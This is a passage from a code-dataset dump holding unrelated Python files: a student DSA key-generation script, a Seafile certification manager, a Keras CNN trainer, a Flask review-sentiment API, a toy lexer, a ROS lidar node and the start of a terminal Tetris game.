not Cadigan\n\"\"\"\n\nimport random\nimport sympy\n\n\n#these three methods are used to generate the Global Public Key Components\n\n#generating random numbers that fit the condition\n#will want to tell user what i values are value in our interface\n#i must be between 0 and 8!\ndef pgen(i):\n #make sure that the user generated L value is <=1024\n if(512+64*i<=1024):\n L = 512+64*i #generate L value to use for bounds\n a=2**(L-1) #generate lower bound\n b=2**L #upper bound\n\n #generates number in range 2^(L-1)<2^(L)\n p = random.randrange(a+1,b,1)\n #check if p is prime, if not continue generating until it is\n while not sympy.isprime(p):\n p = random.randrange(a+1,b,1)\n return p\n \n else:\n print(\"Enter valid i value!\")\n \n#I dont think it's the logic, I think it's that\n#the q being a prime divisor condition is never met. Or it just takes\n#way too long to generate...\ndef qgen(p):\n #make sure prime is entered\n if(sympy.isprime(p)):\n #generate random q such that 2^159 1:\n h = random.randrange(2,p-1)\n g = (h**((p-1)/q))%p\n return g\n \n\n#these methods are used to generate the public and private key\ndef privatekey(q):\n return random.randrange(1,q)\n \ndef publickey(g,x,p):\n return (g**x)%p\n \np = pgen(8) \nprint(qgen(p))\n\n#print(\"Should say true \" + str(((p-1)%q)==0))\n#print(\"Shouls say true \" + str(sympy.isprime(q)))\n ","sub_path":"finalProject.py","file_name":"finalProject.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"228584263","text":"import logging\nfrom seahub.api2.utils import json_response\nfrom seahub import settings\n\nfrom keeper.catalog.catalog_manager import get_catalog\n\nfrom django.http import JsonResponse\nimport sys\nimport hashlib\nfrom seafobj import commit_mgr, fs_mgr\nfrom seaserv import seafile_api, get_repo\n\nimport time\n\nfrom keeper.models import BCertificate\nfrom seahub.notifications.models import UserNotification\nimport json\nfrom seahub.base.templatetags.seahub_tags import email2nickname\nfrom seahub.utils import send_html_email, get_site_name\nfrom django.utils.translation import ugettext as _\n\n# Get an instance of a logger\nlogger = logging.getLogger(__name__)\n\nMSG_TYPE_KEEPER_BLOXBERG_MSG = 'bloxberg_msg'\n\ndef hash_file(repo_id, path, user_email):\n file = get_file_by_path(repo_id, path)\n BUF_SIZE = 65536 # lets read stuff in 64kb chunks!\n file_hash_inc = hashlib.sha256()\n stream = file.get_stream()\n\n while True:\n data = stream.read(BUF_SIZE)\n if not data:\n break\n file_hash_inc.update(data);\n\n data = {\n 'certifyVariables': {\n 'checksum': file_hash_inc.hexdigest(),\n 'authorName': email2nickname(user_email),\n 'timestampString': str(time.time()),\n }\n }\n return data\n\ndef get_file_by_path(repo_id, path):\n repo = seafile_api.get_repo(repo_id)\n dir = fs_mgr.load_seafdir(repo.id, repo.version, get_commit_root_id(repo_id))\n paths = [_f for _f in path.split(\"/\") if _f]\n for path in paths:\n dir = dir.lookup(path)\n return dir\n\ndef get_commit_id(repo_id):\n repo = seafile_api.get_repo(repo_id)\n commits = seafile_api.get_commit_list(repo.id, 0, 1)\n return commits[0].id\n\ndef get_commit_root_id(repo_id):\n repo = seafile_api.get_repo(repo_id)\n commits = seafile_api.get_commit_list(repo.id, 0, 1)\n commit = commit_mgr.load_commit(repo.id, repo.version, commits[0].id)\n return commit.root_id\n\ndef create_bloxberg_certificate(repo_id, path, transaction_id, created_time, checksum, user_email):\n commit_id 
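In the finalProject.py record above, pgen draws random candidates and retries until sympy.isprime succeeds, and the qgen body is visibly garbled ("such that 2^159 1:"), presumably the DSA bound 2^159 < q < 2^160 with its comparison operators lost. sympy.randprime collapses the retry loop; a sketch keeping the record's L = 512 + 64*i sizing:

import sympy

def pgen(i):
    """Random L-bit prime with L = 512 + 64*i, for 0 <= i <= 8."""
    if not 0 <= i <= 8:
        raise ValueError("i must be between 0 and 8")
    L = 512 + 64 * i
    return sympy.randprime(2 ** (L - 1), 2 ** L)

p = pgen(0)
print(p.bit_length())   # 512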
= get_commit_id(repo_id)\n obj_id = BCertificate.objects.add_bloxberg_certificate(transaction_id, repo_id, path, commit_id, created_time, user_email, checksum)\n send_notification(repo_id, path, transaction_id, created_time, user_email)\n return obj_id\n\ndef certified_with_keeper(repo_id, path):\n commit_id = get_commit_id(repo_id)\n return BCertificate.objects.has_bloxberg_certificate(repo_id, path, commit_id)\n\ndef send_notification(repo_id, path, transaction_id, timestamp, user_email):\n BLOXBERG_MSG=[]\n msg = 'Your data was successfully certified!'\n msg_transaction = 'Transaction ID: ' + transaction_id\n file_name = path.rsplit('/', 1)[-1]\n BLOXBERG_MSG.append(msg)\n BLOXBERG_MSG.append(msg_transaction)\n\n UserNotification.objects._add_user_notification(user_email, MSG_TYPE_KEEPER_BLOXBERG_MSG,\n json.dumps({\n 'message':('; '.join(BLOXBERG_MSG)),\n 'transaction_id': transaction_id,\n 'repo_id': repo_id,\n 'link_to_file': path,\n 'file_name': file_name,\n 'author_name': email2nickname(user_email),\n }))\n\n c = {\n 'to_user': user_email,\n 'message_type': 'bloxberg_msg',\n 'message':('; '.join(BLOXBERG_MSG)),\n 'transaction_id': transaction_id,\n 'repo_id': repo_id,\n 'link_to_file': path,\n 'file_name': file_name,\n 'author_name': email2nickname(user_email),\n 'timestamp': timestamp,\n }\n\n try:\n send_html_email(_('New notice on %s') % get_site_name(),\n 'notifications/keeper_email.html', c,\n None, [user_email])\n\n logger.info('Successfully sent email to %s' % user_email)\n except Exception as e:\n logger.error('Failed to send email to %s, error detail: %s' % (user_email, e))\n","sub_path":"seafile_keeper_ext/seafile-server-latest/seahub/keeper/bloxberg/bloxberg_manager.py","file_name":"bloxberg_manager.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"349902875","text":"\"\"\"\n\n숫자 예제\nhttps://github.com/raghakot/keras-vis/blob/master/examples/vggnet/activation_maximization.ipynb\nhttps://github.com/raghakot/keras-vis\nhttps://raghakot.github.io/keras-vis/\n\n> 완성.. 이걸로 사용!!!\n\n\"\"\"\n\n\nfrom __future__ import print_function\n\n\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Dropout, Flatten, Activation, Input\n\nfrom keras import backend as K\n\n\"\"\"\nreference 1(17, IEEE) 모델\nhttps://www.kaggle.com/vishwasgpai/guide-for-creating-cnn-model-using-csv-file\n\"\"\"\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. 
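The hash_file function above streams the Seafile object through an incremental SHA-256 in 64 KB chunks, so the whole file never sits in memory at once. The same pattern for any binary file-like object:

import hashlib
import io

def sha256_of_stream(stream, buf_size=65536):
    """Incrementally hash a binary stream in buf_size chunks."""
    h = hashlib.sha256()
    while True:
        chunk = stream.read(buf_size)
        if not chunk:
            break
        h.update(chunk)
    return h.hexdigest()

print(sha256_of_stream(io.BytesIO(b"hello")))
# 2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824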
pd.read_csv)\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.layers import Flatten\nfrom keras.layers import BatchNormalization\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.layers.convolutional import MaxPooling2D, AveragePooling2D\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom keras import backend as K\nimport tensorflow as tf\nfrom keras import applications as app\n\nsess = tf.Session()\nK.set_session(sess)\n\n\n\n\ndef dataset():\n # Read training and test data files\n train = pd.read_csv(\"../dataFiles/train_337_datafile2.csv\", encoding='utf-8', engine='python').values\n validation = pd.read_csv(\"../dataFiles/test_84_datafile2.csv\", encoding='utf-8', engine='python').values\n\n # Reshape and normalize training data\n # trainX = train[:, 1:].reshape(train.shape[0],1,128, 1152).astype( 'float32' )\n trainX = train[:, 2:147458].reshape(train.shape[0], 1, 128, 1152).astype('float32') # (2~147457)\n X_train = trainX / 255.0\n y_train = train[:, 1] # lable column is [1]\n\n # Reshape and normalize test data\n # testX = test[:,1:].reshape(test.shape[0],1, 128, 1152).astype('float32')\n testX = validation[:, 2:147458].reshape(validation.shape[0], 1, 128, 1152).astype('float32')\n X_test = testX / 255.0\n y_test = validation[:, 1]\n\n # from sklearn.preprocessing import LabelEncoder,OneHotEncoder\n from sklearn import preprocessing\n\n lb = preprocessing.LabelBinarizer()\n y_train = lb.fit_transform(y_train)\n y_test = lb.fit_transform(y_test)\n\n return X_train, y_train, X_test, y_test\n\n\n\n\n# return model\ndef get_model():\n model = Sequential()\n K.set_image_dim_ordering('th')\n\n # make the CNN model\n # layer 1: [filter = 16*16, channel =1, filter 수 = 32], activation fun = ReLu\n model.add(Convolution2D(32, 5, 5, border_mode='valid', input_shape=(1, 128, 1152), activation='relu')) # nb_filter, nb_row, nb_col\n # model.add(BatchNormalization())\n model.add(MaxPooling2D(pool_size=(4, 4))) # pooling1 : MaxPooling\n# model.add(AveragePooling2D(pool_size=(4, 4))) # pooling1 : MaxPooling\n\n# model.add(Dropout(0.2)) # size 커서 OOM error 생겨서 넣어 봄... 
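The dataset() function above slices columns 2..147457 of each CSV row (147456 values = 1 x 128 x 1152), reshapes to channels-first (N, 1, 128, 1152), scales to [0, 1], and one-hot encodes the label column with LabelBinarizer. The same transform on random stand-in rows:

import numpy as np
from sklearn.preprocessing import LabelBinarizer

n = 6
rows = np.random.randint(0, 256, size=(n, 2 + 128 * 1152))   # [id, label, 147456 pixels]
X = rows[:, 2:].reshape(n, 1, 128, 1152).astype("float32") / 255.0
y = LabelBinarizer().fit_transform([0, 1, 2, 0, 1, 2])        # one column per class seen

print(X.shape, float(X.max()) <= 1.0, y.shape)                # (6, 1, 128, 1152) True (6, 3)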
and overfitiing 방지\n\n # layer 2: [filter = 9*9, channel =1, filter 수 = 32], activation fun = ReLu\n model.add(Convolution2D(64, 3, 3, activation='relu'))\n model.add(BatchNormalization())\n# model.add(Convolution2D(64, 3, 3, activation='relu'))\n# model.add(MaxPooling2D(pool_size=(2, 2))) # pooling1 : MaxPooling\n# model.add(AveragePooling2D(pool_size=(2, 2))) # pooling2 : AveragePooling\n\n\n model.add(Convolution2D(128, 3, 3, activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2))) # pooling1 : MaxPooling\n # model.add(AveragePooling2D(pool_size=(2, 2))) # pooling2 : AveragePooling\n\n '''\n\n # layer 3: [filter = 5*5, channel =1, filter 수 = 32], activation fun = ReLu\n # model.add(Convolution2D(256, 3, 3, activation='relu'))\n # model.add(BatchNormalization())\n# model.add(MaxPooling2D(pool_size=(2, 2))) # pooling1 : MaxPooling\n # model.add(AveragePooling2D(pool_size=(2, 2))) # pooling1 : MaxPooling\n# model.add(Dropout(0.3)) # size 커서 OOM error 생겨서 넣어 봄...\n\n# model.add(Convolution2D(256, 3, 3, activation='relu'))\n# model.add(MaxPooling2D(pool_size=(2, 2)))\n # model.add(Convolution2D(256, 3, 3, activation='relu'))\n # model.add(BatchNormalization())\n\n\n\n '''\n\n\n model.add(Flatten())\n\n # model.add(Dense(24576, activation= 'relu' ))\n# model.add(Dense(4096, activation= 'relu' ))\n model.add(Dense(625, activation='relu'))\n model.add(Dense(256, activation='relu')) # 2^8\n model.add(Dense(10, activation='softmax', name='preds'))\n\n return model\n\n\n# https://tykimos.github.io/2017/09/24/Custom_Metric/\ndef single_class_precision(interesting_class_id):\n # 특정 클래스에 대한 정밀도를 평가하는 함수. 여러개의 클래스를 하나의 함수로 사용할 수 있게 interesting_class_id 인자 사용\n def prec(y_true, y_pred):\n class_id_true = K.argmax(y_true, axis=-1)\n class_id_pred = K.argmax(y_pred, axis=-1)\n precision_mask = K.cast(K.equal(class_id_pred, interesting_class_id), 'int32')\n class_prec_tensor = K.cast(K.equal(class_id_true, class_id_pred), 'int32') * precision_mask\n class_prec = K.cast(K.sum(class_prec_tensor), 'float32') / K.cast(K.maximum(K.sum(precision_mask), 1),\n 'float32')\n return class_prec\n\n return prec\n\n\ndef single_class_recall(interesting_class_id):\n # 클래스 별로 확인 할 때, 정밀도와 재현율 파악도 도움이 됨\n # 특정 클래스에 대한 재현율 평가\n def recall(y_true, y_pred):\n class_id_true = K.argmax(y_true, axis=-1)\n class_id_pred = K.argmax(y_pred, axis=-1)\n recall_mask = K.cast(K.equal(class_id_true, interesting_class_id), 'int32')\n class_recall_tensor = K.cast(K.equal(class_id_true, class_id_pred), 'int32') * recall_mask\n class_recall = K.cast(K.sum(class_recall_tensor), 'float32') / K.cast(K.maximum(K.sum(recall_mask), 1),\n 'float32')\n return class_recall\n\n return recall\n\n\ndef result(score, y_test, predic):\n trueD = []\n predicD = np.array(predic)\n\n for i in range(y_test.shape[0]):\n datum = y_test[i]\n decoded_datum = np.argmax(y_test[i]) # decode(y_test[i])\n trueD.append(decoded_datum)\n # print('decoded datum: %s' % decoded_datum)\n\n print('===' * 30)\n print(\"score : \", score)\n print('test(validation) data : ', len(y_test))\n print('predicD: ', predicD)\n print('trueD : ', trueD)\n\n count = 0\n for i in range(len(trueD)):\n if (trueD[i] == predicD[i]):\n count += 1\n\n print('---' * 30)\n\n print(\" 총 맞춘 예측 갯수 : \", count)\n print(\" 틀린 예측 갯수 : \", len(trueD) - count)\n print('===' * 30)\n\n\n##############\n\n\ndef train_visual(hist):\n # 학습과정 시각화\n import matplotlib.pyplot as plt\n\n plt.plot(hist.history['prec'], label='precision 1')\n plt.plot(hist.history['prec_1'], label='precision 1')\n 
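The single_class_precision and single_class_recall factories above compute per-class metrics inside the Keras graph by argmaxing both label tensors and masking on one class id. The same quantities on plain integer arrays, handy for sanity-checking the custom metrics offline:

import numpy as np

def per_class_precision_recall(y_true, y_pred, class_id):
    """Precision and recall for one class, from integer label arrays."""
    y_true, y_pred = np.asarray(y_true), np.asarray(y_pred)
    pred_pos = y_pred == class_id
    true_pos = (y_true == class_id) & pred_pos
    precision = true_pos.sum() / max(pred_pos.sum(), 1)   # guard empty denominators
    recall = true_pos.sum() / max((y_true == class_id).sum(), 1)
    return precision, recall

print(per_class_precision_recall([0, 0, 1, 1], [0, 1, 1, 1], 1))  # (0.666..., 1.0)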
plt.plot(hist.history['prec_2'], label='precision 2')\n plt.plot(hist.history['prec_3'], label='precision 3')\n plt.plot(hist.history['prec_4'], label='precision 4')\n plt.plot(hist.history['prec_5'], label='precision 5')\n plt.plot(hist.history['prec_6'], label='precision 6')\n plt.plot(hist.history['prec_7'], label='precision 7')\n plt.plot(hist.history['prec_8'], label='precision 8')\n plt.plot(hist.history['prec_9'], label='precision 9')\n\n plt.xlabel('epoch')\n plt.ylabel('precision')\n plt.legend(loc='lower right')\n plt.show()\n\n ############\n\n plt.plot(hist.history['recall'], label='recall 0')\n plt.plot(hist.history['recall_1'], label='recall 1')\n plt.plot(hist.history['recall_2'], label='recall 2')\n plt.plot(hist.history['recall_3'], label='recall 3')\n plt.plot(hist.history['recall_4'], label='recall 4')\n plt.plot(hist.history['recall_5'], label='recall 5')\n plt.plot(hist.history['recall_6'], label='recall 6')\n plt.plot(hist.history['recall_7'], label='recall 7')\n plt.plot(hist.history['recall_8'], label='recall 8')\n plt.plot(hist.history['recall_9'], label='recall 9')\n plt.xlabel('epoch')\n plt.ylabel('recall')\n plt.legend(loc='lower right')\n plt.show()\n\n\ndef result_visual(score):\n import numpy as np\n\n metrics = np.array(score[2:])\n idx = np.linspace(0, 19, 20)\n precision = metrics[(idx % 2) == 0]\n recall = metrics[((idx + 1) % 2) == 0]\n\n import matplotlib.pyplot as plt\n\n N = 10\n ind = np.arange(N)\n width = 0.35\n\n fig, ax = plt.subplots()\n prec_bar = ax.bar(ind, precision, width, color='r')\n recall_bar = ax.bar(ind + width, recall, width, color='y')\n\n ax.set_ylabel('Scores')\n ax.set_title('Precision and Recall')\n ax.set_xticks(ind + width / 2)\n ax.set_xticklabels(\n ('0 : 감사', '1: 괜찮다', '2: 사랑', '3: 기쁘다', '4: 미안', '5: 안되다', '6: 안녕', '7: 늦다', '8: 만나다', '9: 부끄럽다'))\n\n ax.legend((prec_bar[0], recall_bar[0]), ('Precision', 'Recall'))\n\n plt.show()\n\n\ndef cnnfeature_vis(model):\n from vis.visualization import visualize_activation\n from vis.utils import utils\n from keras import activations\n\n from matplotlib import pyplot as plt\n # %matplotlib inline\n plt.rcParams['figure.figsize'] = (18, 6)\n\n # Utility to search for layer index by name.\n # Alternatively we can specify this as -1 since it corresponds to the last layer.\n layer_idx = utils.find_layer_idx(model, 'preds')\n\n # Swap softmax with linear\n model.layers[layer_idx].activation = activations.linear\n model = utils.apply_modifications(model)\n\n # This is the output node we want to maximize.\n filter_idx = 0\n img = visualize_activation(model, layer_idx, filter_indices=filter_idx)\n plt.imshow(img[..., 0])\n\n for output_idx in np.arange(10):\n # Lets turn off verbose output this time to avoid clutter and just see the output.\n img = visualize_activation(model, layer_idx, filter_indices=output_idx, input_range=(0., 1.))\n plt.figure()\n plt.title('Networks perception of {}'.format(output_idx))\n plt.imshow(img[..., 0])\n\n # Visualizations without swapping softmax\n # Swap linear back with softmax\n model.layers[layer_idx].activation = activations.softmax\n model = utils.apply_modifications(model)\n\n for output_idx in np.arange(10):\n # Lets turn off verbose output this time to avoid clutter and just see the output.\n # Visualizations without swapping softmax\n img = visualize_activation(model, layer_idx, filter_indices=output_idx, input_range=(0., 1.))\n plt.figure()\n plt.title('Networks perception of {}'.format(output_idx))\n plt.imshow(img[..., 0])\n 
plt.show()\n\n################\n\n\n\ndef main():\n model = get_model()\n\n X_train, y_train, X_test, y_test = dataset()\n\n # Compile model\n# model.compile(loss='categorical_crossentropy', optimizer= 'adam', metrics=['accuracy']) # base\n\n\n\n\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy',\n single_class_precision(0), single_class_recall(0),\n single_class_precision(1), single_class_recall(1),\n single_class_precision(2), single_class_recall(2),\n single_class_precision(3), single_class_recall(3),\n single_class_precision(4), single_class_recall(4),\n single_class_precision(5), single_class_recall(5),\n single_class_precision(6), single_class_recall(6),\n single_class_precision(7), single_class_recall(7),\n single_class_precision(8), single_class_recall(8),\n single_class_precision(9), single_class_recall(9)])\n\n\n\n # model.fit(X_train, y_train, epochs=5, batch_size=512) # mini-batch : 64, 128, 256, 512 size(memory size에 맞춰) epochs=300\n hist = model.fit(X_train, y_train, epochs=50, batch_size=128) # mini-batch : 64, 128, 256, 512 size(memory size에 맞춰) epochs=300\n # small batch = 8\n\n\n # model save\n model.save('./models/model_1-2.h5')\n\n\n print('model summary : ', model.summary()) # model에 대한 정보(summary) 출력\n\n\n\n score = model.evaluate(X_test, y_test, batch_size=128)\n # predicD = model.predict(testX, verbose=1)\n predic = model.predict_classes(X_test, verbose=1)\n\n\n result(score, y_test, predic)\n train_visual(hist)\n result_visual(score)\n\n #cnnfeature_vis(model)\n\n\n\n\n K.clear_session() # 모델 닫기\n\n\n\n\n\nmain()\n\n\n\n'''\nif __name__ == '__main__':\n\n result(score, y_test, predic)\n train_visual(hist)\n result_visual(score)\n\n\n'''\n\n","sub_path":"code/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":13252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"458478756","text":"from flask import Flask, jsonify, request\nimport pickle\nimport sys\nimport numpy as np\nimport nlp_utils\nimport os \napp = Flask(__name__)\ntfidf_vect = pickle.load(open(os.path.join('.','tf_idf_review_vectorizer.sav'),'rb'))\nmodel = pickle.load(open(os.path.join('.','imdb_reviews_model.sav'), 'rb'))\n\n@app.route('/')\ndef home():\n return jsonify(data='Welcome Home')\n@app.route('/review_sentiment')\ndef review_sentiment():\n review = request.args.get('review','unknown')\n cleaned_review = nlp_utils.process_text(review)\n vectorized_review = tfidf_vect.transform([cleaned_review]).toarray()\n pred = model.predict_proba(vectorized_review)[0, 1]\n print(pred)\n n = np.random.randint(0,4)\n if review == 'unknown':\n results = [\"Try again and check your spelling pal\",\n \"Didn't quite catch that one\",\n \"Are you trying to trip me out\",\n \"Have another a go, may have been an input error\"]\n return jsonify(response=results[n])\n if pred > 0.70:\n results = [\"Wow, you sure are feeling positive about that!\",\n \"Awesome, there needs to be more happiness in the world!\",\n \"I'll definitely watch this one then, cheers for the heads up\",\n \"Smashing, sounds like a blast!\"]\n return jsonify(response=results[n], review = review)\n elif pred > 0.5 and pred < 0.7:\n results = [\"Sounds like you liked this one\",\n \"Pretty good film eh?\",\n \"I'm glad you had a good time\",\n \"Nice one bruvaaaa!\"]\n return jsonify(response=results[n], review = review)\n elif pred < 0.5 and pred > 0.2:\n results = [\"Sounds like this one was not your cup of tea\",\n \"I recommend you watch 
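The Flask app.py record beginning above unpickles a fitted TF-IDF vectoriser plus classifier and buckets predict_proba into response tiers at 0.7, 0.5, and 0.2. An end-to-end miniature of that scoring path on toy training data (the record's pickled artefacts are assumed to be exactly such a vectoriser/model pair):

from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression

train = ["loved it brilliant film", "wonderful acting great story",
         "awful boring mess", "terrible waste of time"]
vect = TfidfVectorizer()
model = LogisticRegression().fit(vect.fit_transform(train), [1, 1, 0, 0])

p = model.predict_proba(vect.transform(["great brilliant film"]))[0, 1]
if p > 0.7:
    print(f"{p:.2f}: very positive")
elif p > 0.5:
    print(f"{p:.2f}: positive")
elif p > 0.2:
    print(f"{p:.2f}: negative")
else:
    print(f"{p:.2f}: very negative")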
another film next time\",\n \"Not the best film you've ever seen then?\",\n \"Okay, put it in the past then. There's plenty of life ahead.\"]\n return jsonify(response=results[n],review = review)\n else:\n results = [\"Ok, it seems like you're really not that keen on this one..\",\n \"Sounds awful.\",\n \"Guess you won't be watching this again\",\n \"Oh okay...I would advise on you not watching this again?\"]\n return jsonify(response=results[n], review = review)\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"106744099","text":"import re, string\n\ntokenTypeHashMap = {\n \"<\": \"iC\", # iC stands for index changer\n \">\": \"iC\", # iC stands for index changer\n \"+\": \"op\",\n \"-\": \"op\",\n \"=\": \"op\",\n \"[\": \"bS\", # bS stands for bracket start\n \"]\": \"bE\", # bE stands for bracket end\n \".\": \"I/O\", # I/O is the input / output stream \n \",\": \"I/O\" # I/O is the input / output stream\n}\n\n# ---------------------------------------- Token Class ----------------------------------------\n\nclass Token:\n\n def __init__ (self, v: str, t: str):\n \"\"\" The class takes the following arguemnts: \n - v: value\n - t: type (ID's, Opperations, Structures ext.)\n \"\"\"\n self.value = v\n self.type = t\n \n def __repr__ (self):\n \"\"\" Simpely returns the type and value of the token \"\"\"\n return (\"Type: {0}, Value: {1}\".format(self.type, self.value))\n\n# ---------------------------------------- Lexer Class ----------------------------------------\n\nclass Lexer:\n \n def __init__ (self):\n \"\"\" Initialise the Lexer Class \"\"\"\n self.tokens = []\n\n def convertToTokenList (self, data: str) -> [Token]:\n \"\"\" Converts a data string to a token list \"\"\"\n self.tokens = []\n \n # 1. Split the data into a list of substrings (aka lines)\n lines = re.findall(r\".+\\n\", data)\n \n # 2. Remove the spaces \n lines = [re.sub(r\"\\s+\", \"\", line) for line in lines]\n\n # 3. 
Figure out the operation\n for line in lines:\n if (line[0] == \"+\"):\n # Slit the string into two different sections one operation part and one number part\n op, num = line[0], re.findall(r\"\\d+\", line)\n if (num == []):\n num = [1]\n self.tokens.append([Token(op, tokenTypeHashMap[op]), Token(num[0], \"num\")])\n elif (line[0] == \"-\"):\n # Slit the string into two different sections one operation part and one number part\n op, num = line[0], re.findall(r\"\\d+\", line)\n if (num == []):\n num = [1]\n self.tokens.append([Token(op, tokenTypeHashMap[op]), Token(num[0], \"num\")])\n \n elif (line[0] == \"=\"):\n # Slit the string into two different sections one operation part and one number part\n op, num = line[0], re.findall(r\"\\d+\", line)\n if (num == []):\n num = [0]\n self.tokens.append([Token(op, tokenTypeHashMap[op]), Token(num[0], \"num\")])\n\n elif (line[0] == \"<\"):\n # Save the the instruction in the tokens list\n self.tokens.append([Token(line[0], tokenTypeHashMap[line[0]])])\n \n elif (line[0] == \">\"):\n # Save the the instruction in the tokens list\n self.tokens.append([Token(line[0], tokenTypeHashMap[line[0]])])\n \n elif (line[0] == \".\"):\n # Save the the instruction in the tokens list\n self.tokens.append([Token(line[0], tokenTypeHashMap[line[0]])])\n\n elif (line[0] == \",\"):\n # Save the the instruction in the tokens list\n self.tokens.append([Token(line[0], tokenTypeHashMap[line[0]])])\n\n else:\n raise ValueError(\"Line ({0}) connot start with ({1})\".format(line, line[0]))\n \n [print(t) for t in self.tokens]\n return self.tokens\n ","sub_path":"src/Lexer.py","file_name":"Lexer.py","file_ext":"py","file_size_in_byte":3507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"117504557","text":"#!/usr/bin/env python\r\nimport rospy\r\nfrom sensor_msgs.msg import LaserScan\r\nfrom std_msgs.msg import Float32MultiArray\r\nfrom object_detector import ObjectDetector\r\n\r\ndef lidar_callback(self, msg):\r\n# msg.ranges #常時360個の配列となる\r\n# msg.angle_min # スキャンの開始角度[rad] 常時約-3.14radとなる\r\n# msg.angle_max # スキャンの終了角度[rad] 常時約3.14radとなる\r\n# msg.angle_increment # 計測間隔[rad] 常時0.017rad = 1degreeとなる\r\n# msg.range_min # 最小検出距離[m] 常時約0.15mとなる\r\n# msg.range_max # 最大検出距離[m] 常時約12.00mとなる\r\n objdtct = ObjectDetector()\r\n dist_list = objdtct.GetObject2D(msg.ranges)\r\n pub.publish(dist_list)\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n rospy.init_node('drive_mod')\r\n rospy.Subscriber(\"rplidar_scan\", LaserScan, lidar_callback) \r\n # 1: name of the Topic, 2: data type of the topic 3: callback func\r\n pub = rospy.Publisher('ptop_distnce', Float32MultiArray, queue_size = 1)\r\n\r\n rate = rospy.Rate(10)\r\n while not rospy.is_shutdown():\r\n rate.sleep()","sub_path":"drive_manager.py","file_name":"drive_manager.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"56686169","text":"import terminalgame\nimport random\nfrom terminalgame.Rect import Rect\nfrom terminalgame.locals import *\nfrom terminalgame.Surface import Surface\nimport time\nCOLORS = ('o', '#')\n# 模板的宽高\nTEMPLATEWIDTH = 5\nTEMPLATEHEIGHT = 5\nfallFreq = 0.27\n# 形状_S(S旋转有2种)\nS_SHAPE_TEMPLATE = [['.....',\n '.....',\n '..OO.',\n '.OO..',\n '.....'],\n ['.....',\n '..O..',\n '..OO.',\n '...O.',\n '.....']]\n\n# 形状_Z(Z旋转有2种)\nZ_SHAPE_TEMPLATE = [['.....',\n '.....',\n '.OO..',\n '..OO.',\n '.....'],\n ['.....',\n '..O..',\n '.OO..',\n '.O...',\n '.....']]\n\n# 
形状_I(I旋转有2种)\nI_SHAPE_TEMPLATE = [['..O..',\n '..O..',\n '..O..',\n '..O..',\n '.....'],\n ['.....',\n '.....',\n 'OOOO.',\n '.....',\n '.....']]\n\n# 形状_O(O旋转只有一个)\nO_SHAPE_TEMPLATE = [['.....',\n '.....',\n '.OO..',\n '.OO..',\n '.....']]\n\n# 形状_J(J旋转有4种)\nJ_SHAPE_TEMPLATE = [['.....',\n '.O...',\n '.OOO.',\n '.....',\n '.....'],\n ['.....',\n '..OO.',\n '..O..',\n '..O..',\n '.....'],\n ['.....',\n '.....',\n '.OOO.',\n '...O.',\n '.....'],\n ['.....',\n '..O..',\n '..O..',\n '.OO..',\n '.....']]\n\n# 形状_L(L旋转有4种)\nL_SHAPE_TEMPLATE = [['.....',\n '...O.',\n '.OOO.',\n '.....',\n '.....'],\n ['.....',\n '..O..',\n '..O..',\n '..OO.',\n '.....'],\n ['.....',\n '.....',\n '.OOO.',\n '.O...',\n '.....'],\n ['.....',\n '.OO..',\n '..O..',\n '..O..',\n '.....']]\n\n# 形状_T(T旋转有4种)\nT_SHAPE_TEMPLATE = [['.....',\n '..O..',\n '.OOO.',\n '.....',\n '.....'],\n ['.....',\n '..O..',\n '..OO.',\n '..O..',\n '.....'],\n ['.....',\n '.....',\n '.OOO.',\n '..O..',\n '.....'],\n ['.....',\n '..O..',\n '.OO..',\n '..O..',\n '.....']]\n\n# 定义一个数据结构存储,对应的形状\nPIECES = {'S': S_SHAPE_TEMPLATE,\n 'Z': Z_SHAPE_TEMPLATE,\n 'J': J_SHAPE_TEMPLATE,\n 'L': L_SHAPE_TEMPLATE,\n 'I': I_SHAPE_TEMPLATE,\n 'O': O_SHAPE_TEMPLATE,\n 'T': T_SHAPE_TEMPLATE}\n\n\nWINDOWWIDTH = 50#整个游戏屏幕的宽\nWINDOWHEIGHT = 50#整个游戏屏幕的高\n# 放置俄罗斯方块窗口的大小\nBOARDWIDTH = 20 \nBOARDHEIGHT = 20\nBLANK = '.' # 代表空的形状\n\nXMARGIN = 0\nTOPMARGIN = 0\nBOXSIZE = 2\n\n# board边界\ndef isOnBoard(x, y):\n return x >= 0 and x < BOARDWIDTH and y < BOARDHEIGHT\n\n# piece在当前的board里是否是一个合法可用的位置\ndef isValidPosition(board, piece, adjX=0, adjY=0):\n # Return True if the piece is within the board and not colliding\n for x in range(TEMPLATEWIDTH):\n for y in range(TEMPLATEHEIGHT):\n isAboveBoard = y + piece['y'] + adjY < 0\n if isAboveBoard or PIECES[piece['shape']][piece['rotation']][y][x] == BLANK:\n continue\n if not isOnBoard(x + piece['x'] + adjX, y + piece['y'] + adjY):\n return False\n if board[x + piece['x'] + adjX][y + piece['y'] + adjY] != BLANK:\n return False\n return True\n\ndef addToBoard(board, piece): 